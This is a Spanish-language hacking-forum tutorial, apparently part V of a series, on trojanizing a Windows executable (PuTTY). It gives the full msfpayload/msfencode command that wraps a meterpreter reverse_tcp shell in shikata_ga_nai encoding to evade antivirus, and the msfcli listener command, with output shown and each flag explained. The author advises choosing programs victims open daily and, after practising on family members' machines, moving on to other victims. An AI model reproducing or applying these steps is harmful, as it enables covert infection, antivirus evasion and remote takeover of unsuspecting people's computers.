+Introduccion+Temario
-+Introduccion
-+Seleccionando ejecutable
-+¿Backdorizando?
-+¿msfpayload?
-+Analizando msfpayload
-+¿Listener?
-+¿Msfcli?
-+Lazando listener
-+Analziando listener
-+Conclucion
- Bueno ya emos visto como penetrar una maquina remota
pero que pasa si no tiene vulnerabilidades???
Bueno como dije en la lectura obligatoria, hay veces que
tenemos que "forzar" el asun jejejeje y esta vez les voy a
eneseñar como poner un revers shell en un (.EXE)
en pocas palabras vamos a poner un backdoor en cualquier
ejecutable que nosotro queramos
Bueno en mi casa infectare el putty con un rever shell meterpreter
y lo encodearmos con shikata_ga_nai que es tipica jejeje
- Bueno aqui los amigos de metasploit fueron brillantemente sencillos
y nos facilitaron la tarea podiendo backdorizar cualqueri cosa que
queramos en mi caso usar putty ustedes pueden ustilizar lo que
quiera y les recomiendo algo que sepan que la victima abre diario
como msn, iexplorer, firefox u lo que sea.
+¿Backdorizando?
- Ok lo primero que vamos a hacer es colocarnos en la caperta donde
renemos nuestro metasploit guardado y vamos a a consola
Código: Seleccionar todo
shiva-sheva@cracker:~$ cd metasploit
shiva-sheva@cracker:~/metasploit$ ls
1 HACKING msfconsole msfgui msfpescan plugins tools
data lib msfd msfmachscan msfrpc README
documentation modules msfelfscan msfopcode msfrpcd scripts
external msfcli msfencode msfpayload msfweb test
shiva-sheva@cracker:~/metasploit$
- En mi caso es asi no se ustedes donde la tenga
+¿msfpayload?
- Bueno este es el que usaremos para backdorizar
y veamos como se hace esto y despues lo analizamos!
Código: Seleccionar todo
shiva-sheva@cracker:~/metasploit$ su
Password:
root@cracker:/home/shiva-sheva/metasploit# ./msfpayload windows/meterpreter/reverse_tcp LHOST=201.137.195.203 LPORT=8080 R | ./msfencode -t exe -x /tmp/putty.exe -o /tmp/putty_bd.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
root@cracker:/home/shiva-sheva/metasploit#
+Analizando msfpayload
- Primero me logie con su para tener permisos de root
Despues
./msfpayload: Lo llamamos
windows/meterpreter/reverse_tcp: Indicamos la direcion del rever shell
LHOST=201.137.195.203 : Ojo aqui el el local host pongan sus ip's pubicas
LPORT=8080 R: Indicamosel puerto porle cual conectara
| : Separamos
./msfencode: Lo llamamos este sirve para "encryptar" para que entiendan jeje
-t exe: Indicamso que es un exe
-x /tmp/putty.exe: Hubicacion del archivo
-o /tmp/putty_bd.exe: Hubicacion donde se guardara y el nombre con el que se guardara
-e x86/shikata_ga_nai: Metodo de codificacion y su ruta
-c 5: Numero de veces a encodificar para que quede FUD!
Interesante no? ....
- Bueno ya hicimos una parte que es backdorizar un .EXE
ahora tenemos que poner algo que escuche la conexion
cuando ejecuten ese backdoor no???
Bueno para esto sirve el listener
- Bueno bueno no se rompan la cabeza no es tan complicado
metasploit nos ofrece como ya lo e dicho una alta gama
de jugetes muy divertidos en este caso usaremos msfcli
para lanzar nuestro listener.
Código: Seleccionar todo
root@cracker:/home/shiva-sheva/metasploit# ./msfcli exploit/multi/handler payloader=shikata_ga_nai LHOST=201.137.195.203 LPORT=8080 payload=windows/meterpreter/reverse_tcp E
[*] Please wait while we load the module tree...
[-] Handler failed to bind to 201.137.195.203:8080
[*] Started reverse handler on 0.0.0.0:8080
[*] Starting the payload handler...
+Analziando listener
- Tenemos que ser muy especificos en esto por que si ponemos algo mal no va a conectar
mucho cuidado con la ortografia y recuerden poner lo mismo que pusieron en msfcli
les recoemidno de nuevo practicar con una maquina que tengan en red de su mama
hermana o hermano papa lo que sea pero en red es mas sencillo y despues ya se
pasan con una victima de otra parte!
- Bueno
./msfcli: Lo llamamos
exploit/multi/handler: Ruta del exploit
payloader=shikata_ga_nai: indicamos el payloader
LHOST=201.137.195.203 : Su ip
LPORT=8080 : El puerto
payload=windows/meterpreter/reverse_tcp E: Indicamos el payload
- Y bueno en est aparte quiero dar una gran gran parte de los creditos
a este ProcessKill que sin el no hubira podido hacer la pruebas del
backdoor y me hubiera tardado mas en postear Gracias amigo
Esperan la parte VI